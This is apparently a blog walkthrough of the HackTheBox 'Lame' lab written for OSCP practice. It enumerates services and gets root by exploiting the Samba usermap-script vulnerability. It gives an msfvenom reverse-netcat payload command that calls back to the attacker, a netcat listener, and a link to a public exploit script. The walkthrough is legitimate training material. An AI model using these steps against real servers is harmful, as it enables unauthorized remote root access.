Hackthebox LAME Walkthrough (NO Metasploit) OSCP Prep.
Box Details
OS: Linux
Exploitable service: SMB
Difficulty: Easy
Estimated time: 45 minutes
1. Run NMAP scan to detect open ports
start with a full scan
This scan shows there are 4 ports open and shows the service running on the ports
port 21 FTP: vsftpd 2.3.4 (vulnerable) but a rabbit hole
port 22 SSH OpenSSH 4.7p1 (from experience SSH is hardly ever exploitable except through brute force or username enumeration)
Port 139: Netbios Samba always works together with port 445
Port 445: SMB: smbd 3.0.20 Debian (vulnerable)
2. run an Nmap scan to check for all ports
A look shows there’s an additional port 3632 with a distccd service running; tried enumerating it via netcat and web but yield no results so i assumed it was a rabbit hole.
The real enumeration
FTP
Firstly i tried checking if i could gain anonymous access via ftp
I successfully gained anonymous access via ftp, tried listing the contents of ftp directory but it seemed empty.
I tried uploading files via the PUT command but it failed.
But remember this is a vulnerable FTP version.
So i searched for public exploits on github (i’m a fan of using already modified scripts or tried scripts on github, though its a bad idea as you should get your exploit from trustworthy sources like exploitdb.com )
I tried some of the exploits here but they didnt work so i figured that a patch must have applied to the ftp application.
SMB Enumeration
Smb is a highly vulnerable services, and i had a feeling that the initial compromise of this box had to be the through this service. The version was already vulnerable to CVE-2007–2447 — Samba usermap script.
So i Knew this was the way into the box.
Tried enumerating via nmap nse but didnt get any results.
Tried Enumerating via Smbclient for shared shares but no results as well.
It was time to explore the SAMBA USERMAP SCRIPT EXPLOIT.
so i used an exploit by Macha97 which was simple python script that involved generating your shellcode with msfvenom and replacing with yours. https://github.com/macha97/exploit-smb-3.0.20
All you had to do as generate your shellcode with MSFvenom commad
#msfvenom -p cmd/unix/reverse_netcat LHOST=YOUR_IP LPORT=PORT -f python
replace your generated shellcode with that in the exploit. Depending on your python version you might have some issues but try using python3.
Set up your Netcat listner with your port. (Nc -lvnp PORT)
Run your exploit and your automatically get a root shell
you can upgrade your shell with python -c 'import pty; pty.spawn("/bin/bash")'
and enumerate to get your User.txt and root.txt.
Privillege escalation was not neccessary as the shell was already a root shell.
Thanks for Reading.